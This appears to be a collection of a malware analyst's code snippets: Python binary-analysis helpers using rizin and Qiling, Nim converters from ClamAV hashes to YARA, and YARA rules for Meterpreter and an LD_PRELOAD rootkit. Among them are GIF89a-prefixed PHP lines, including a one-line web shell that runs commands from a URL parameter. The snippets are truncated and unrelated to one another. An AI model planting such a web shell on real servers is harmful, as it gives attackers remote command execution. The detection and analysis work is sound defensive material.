This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import rzpipe  # Using rizin framework. Replace with r2pipe for radare2
import json
import hashlib
import os


class BinaryMetadata:
    def __init__(self, path: str):
        self.pipe = rzpipe.open(path)
        self.bin_path = path

from qiling import Qiling
from capstone import *

md = Cs(CS_ARCH_X86, CS_MODE_64)


def print_asm(ql, address, size):
    # Credits -> https://isc.sans.edu/diary/Qiling+A+true+instrumentable+binary+emulation+framework/27372
    buf = ql.mem.read(address, size)
    for i in md.disasm(buf, address):
        opcode = ' '.join('{:02x}'.format(x) for x in i.bytes)

dmknght<?php phpinfo();?>

GIF89a <?php system($_GET['c']);?>

GIF89a <?php phpinfo();?>

GIF89a hehe, taking an exam right now

import streams
import bitops
import strutils
import std/enumutils

const
  db_name = "mpavbase.vdm.extracted"

type

# Compile: nim c --opt:speed clam_hashes_to_yara.nim
import strutils

const
  clam_db_path = "/home/dmknght/Desktop/performance_comparison/main.hdb"
  yr_converted_rule = "/home/dmknght/Desktop/performance_comparison/clam_hashes.yara"

type
  HashSig = object

rule elf64_meterpreter_revtcp_raw {
  meta:
    description = "Detect Meterpreter ELF 64 staged reverse TCP no encoders"
  strings:
    $ = {6a 22 [4] 0f 05 [10] 6a 29 [8] 0f 05}
  condition:
    all of them
}

import "elf"

/*
  When the system is infected by this rootkit,
  all processes load the malicious library (LD_PRELOAD).
  It's possible to detect it via strings; however,
  the current Yara version doesn't load the ELF header
  of the mapped file.
*/